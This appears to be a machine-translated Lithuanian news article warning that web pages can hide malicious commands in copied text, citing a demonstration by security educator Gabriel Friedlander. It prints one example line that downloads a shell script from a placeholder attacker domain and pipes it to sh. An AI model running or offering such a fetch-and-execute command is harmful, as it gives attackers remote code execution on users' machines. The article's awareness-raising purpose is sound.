- Mes visi kasdien kopijuojame ir įklijuojame iš interneto, iš tikrųjų nežinodami apie riziką.
- Tai darydamas saugumo ekspertas skyrė laiko visiems parodyti blogiausią scenarijų.
- Iš interneto gautų komandų įklijavimas į savo terminalą yra greitas būdas įsilaužti
- Komandos, kurias manėte įklijuoti į savo terminalą, iš tikrųjų yra kenkėjiški kodai.
Tiesa, kad gyvename epochoje, kai greitis yra viskas, o greiti rezultatai yra svarbiausia. Tačiau mažai žmonių iš tikrųjų sustoja akimirkai ir susimąsto apie pasekmes.
Kasdien milijonai programuotojų, administratorių ir saugos tyrinėtojų atlieka paprastas užduotis, pavyzdžiui, kopijuoja ir įklijuoja komandas iš tinklalapių tiesiai į savo kompiuterių pultus.
Nors daugelis apie tai net nesusimąsto, pasekmės yra didesnės ir pavojingesnės, nei galėtumėte pagalvoti iš pradžių, ypač jei saugote jautrius ar vertingus duomenis.
Žinomas saugumo ekspertas skyrė laiko pasidalinti kas iš tikrųjų gali nutikti jei kopijuojate + įklijuojate turinį iš tinklalapių.
Kopijuoti + įklijuoti yra paprastas būdas iš tikrųjų įsilaužti
Gabrielis Friedlanderis, saugumo sąmoningumo ugdymo platformos Wizer įkūrėjas, nuplėšė schemą, kuri privers gerai pagalvoti prieš kopijuojant ir įklijuojant komandas iš tinklalapių.
Turinio kopijavimas ir įklijavimas iš interneto šiais laikais tapo toks įprastas, kad niekas net nesusimąsto.
Tačiau Friedlanderis įspėja, kad kai kurie tinklalapiai yra labiau apgaulingi, nei iš pradžių galima suprasti, ir tai, ką manote, kad iš jų nukopijavote, labai skiriasi nuo to, ką iš tikrųjų padarėte.
O blogiausia yra tai, kad neturėdami reikiamų žinių ar vadovavimo aukos savo klaidą suvokia tik įklijavę tekstą, o tada jau gali būti per vėlu.
Saugumo analitikas taip pat sukūrė nedidelį testą savo tinklaraščio skaitytojams, kad žmonės iš tikrųjų suprastų, kaip lengva jums nenoromis atverti duris kibernetiniams nusikaltėliams.
Jis pateikė komandą, kuri turi būti nukopijuota, tačiau susijusi tiesa atskleidžiama tik įklijavus tekstą ir pažiūrėjus, ką iš tikrųjų įvedėte savo sąrankoje.
Nukopijavus komandą, parodytą aukščiau esančiame ekrano kopijoje, jos įklijavimo rezultatas jus šokiruos, nes tai toli gražu nėra to, ką manėte kopijuojanti.
garbanoti http://attacker-domain: 8000/shell.sh | shBe visiškai skirtingos komandos, esančios jūsų mainų srityje, naujos eilutės (arba grąžinimo) simbolis adresu jo pabaiga reiškia, kad aukščiau pateiktas pavyzdys būtų vykdomas, kai tik jis bus įklijuotas tiesiai į „Linux“. terminalas.
Taigi geriau žinoti, kas iš tikrųjų vyksta, ir vertinti tai kaip rimtą pavojų saugai. Nesakome, kad visos svetainės slepia kenkėjišką turinį, tačiau verta į tai atsižvelgti.
Ar kada nors buvote įsilaužęs į savo terminalą įklijavęs gudrias komandas? Pasidalykite savo patirtimi su mumis toliau pateiktame komentarų skyriuje.
![5 ir daugiau geriausių įsilaužimų aptikimo programinės įrangos [IDS įrankiai]](/f/97253b0fd53b21b06be0b802ca6d5ab6.jpg?width=300&height=460)